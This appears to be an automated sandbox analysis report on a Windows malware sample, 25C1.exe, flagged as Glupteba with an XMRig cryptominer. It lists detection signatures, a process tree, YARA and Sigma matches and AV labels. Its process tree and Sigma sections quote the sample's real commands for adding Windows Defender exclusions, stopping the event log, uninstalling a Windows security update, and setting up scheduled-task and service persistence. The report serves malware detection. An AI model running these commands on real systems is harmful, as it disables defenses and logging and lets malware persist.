Windows Analysis Report
25C1.exe

Overview

General Information

Sample name: 25C1.exe
Analysis ID: 1480049
MD5: ceae65ee17ff158877706edfe2171501
SHA1: b1f807080da9c25393c85f5d57105090f5629500
SHA256: 0dac8a3fe3c63611b49db21b2756b781cc4c9117c64007e0c23e6d3e7ca9ee49
Tags: exe, Stealc

Detection

Glupteba, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
Yara detected Glupteba
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
DNS related to crypt mining pools
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 25C1.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\25C1.exe" MD5: CEAE65EE17FF158877706EDFE2171501)
    • 288c47bbc1871b439df19ff4df68f076.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" MD5: D122F827C4FC73F9A06D7F6F2D08CD95)
      • powershell.exe (PID: 8172 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 288c47bbc1871b439df19ff4df68f076.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" MD5: D122F827C4FC73F9A06D7F6F2D08CD95)
        • powershell.exe (PID: 4512 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 7636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • InstallSetup4.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" MD5: 28B72E7425D6D224C060D3CF439C668C)
      • BroomSetup.exe (PID: 7748 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 5E94F0F6265F9E8B2F706F1D46BBD39E)
        • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 8040 cmdline: chcp 1251 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • schtasks.exe (PID: 8060 cmdline: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F MD5: 48C2FE20575769DE916F48EF0676A965)
    • FourthX.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
      • powershell.exe (PID: 7788 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7420 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7424 cmdline: C:\Windows\system32\sc.exe delete "UTIXDCVF" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7556 cmdline: C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7800 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7884 cmdline: C:\Windows\system32\sc.exe start "UTIXDCVF" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vueqjgslwynd.exe (PID: 1212 cmdline: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe MD5: B03886CB64C04B828B6EC1B2487DF4A4)
    • powershell.exe (PID: 1692 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7608 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3108 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 2836 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • TrustedInstaller.exe (PID: 1524 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: D098F2FC042FBF6879D47E3A86FBB4A1)
  • svchost.exe (PID: 2292 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8032 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7964 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6608 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
Name: Glupteba
Description: Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: 25C1.exe, Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Author: ditekSHen
Strings:
  • 0x8ad454:$s1: Runner
  • 0x8ad5b9:$s3: RunOnStartup
  • 0x8ad468:$a1: Antis
  • 0x8ad495:$a2: antiVM
  • 0x8ad49c:$a3: antiSandbox
  • 0x8ad4a8:$a4: antiDebug
  • 0x8ad4b2:$a5: antiEmulator
  • 0x8ad4bf:$a6: enablePersistence
  • 0x8ad4d1:$a7: enableFakeError
  • 0x8ad5e2:$a8: DetectVirtualMachine
  • 0x8ad607:$a9: DetectSandboxie
  • 0x8ad632:$a10: DetectDebugger
  • 0x8ad641:$a11: CheckEmulator

Source: sslproxydump.pcap, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Author: Joe Security

Source: 00000027.00000003.1502667713.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000027.00000002.3820414733.0000000001431000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000027.00000003.1502528304.0000000001E56000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000027.00000003.1503963151.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000027.00000002.3820414733.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security

Source: 0.0.25C1.exe.520000.0.unpack, Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Author: ditekSHen
Strings:
  • 0x8ad454:$s1: Runner
  • 0x8ad5b9:$s3: RunOnStartup
  • 0x8ad468:$a1: Antis
  • 0x8ad495:$a2: antiVM
  • 0x8ad49c:$a3: antiSandbox
  • 0x8ad4a8:$a4: antiDebug
  • 0x8ad4b2:$a5: antiEmulator
  • 0x8ad4bf:$a6: enablePersistence
  • 0x8ad4d1:$a7: enableFakeError
  • 0x8ad5e2:$a8: DetectVirtualMachine
  • 0x8ad607:$a9: DetectSandboxie
  • 0x8ad632:$a10: DetectDebugger
  • 0x8ad641:$a11: CheckEmulator

Source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Author: Joe Security
Source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Author: Joe Security
Source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Author: Joe Security
Source: 5.0.BroomSetup.exe.400000.0.unpack, Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Author: Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe", ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7788, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F, CommandLine: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8000, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F, ProcessId: 8060, ProcessName: schtasks.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe", ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto", ProcessId: 7556, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe", ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7788, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon, ProcessId: 2292, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe", ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7800, ProcessName: sc.exe

No Snort rule has matched

Timestamp: 2024-07-24T14:31:33.322221+0200
SID: 2856233
Source Port: 49706
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 25C1.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Avira: detection malicious, Label: TR/Drop.Agent.ojaga
Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe, Avira: detection malicious, Label: TR/Kryptik.hzhfn
Source: C:\Users\user\AppData\Local\Temp\FourthX.exe, Avira: detection malicious, Label: TR/Kryptik.hzhfn
Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\FourthX.exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe, ReversingLabs: Detection: 87%
Source: 25C1.exe, ReversingLabs: Detection: 78%
Source: Yara match, File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, Joe Sandbox ML: detected
Source: 25C1.exe, Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match, File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: 00000027.00000003.1502667713.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.3820414733.0000000001431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1502528304.0000000001E56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1503963151.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.3820414733.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1504028725.0000000001E43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1503587405.0000000001E27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1503587405.0000000001E43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1502528304.0000000001E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1504082814.0000000001E36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1503356384.0000000001E78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1503661320.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1503356384.0000000001E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.3820414733.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.3822093253.0000000001E2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: unknown, DNS query: name: xmr-eu1.nanopool.org
Source: unknown, DNS query: name: xmr-eu2.nanopool.org

Compliance

Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, Unpacked PE file: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, Unpacked PE file: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack
Source: 25C1.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 25C1.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\xericuzakiziy64\dayolev xadesowip kijo.pdbT source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000000.1358564663.0000000000807000.00000002.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000000.1462221086.0000000000807000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: Loader.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: EfiGuardDxe.pdb7 source: 288c47bbc1871b439df19ff4df68f076.exe
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdb source: 288c47bbc1871b439df19ff4df68f076.exe
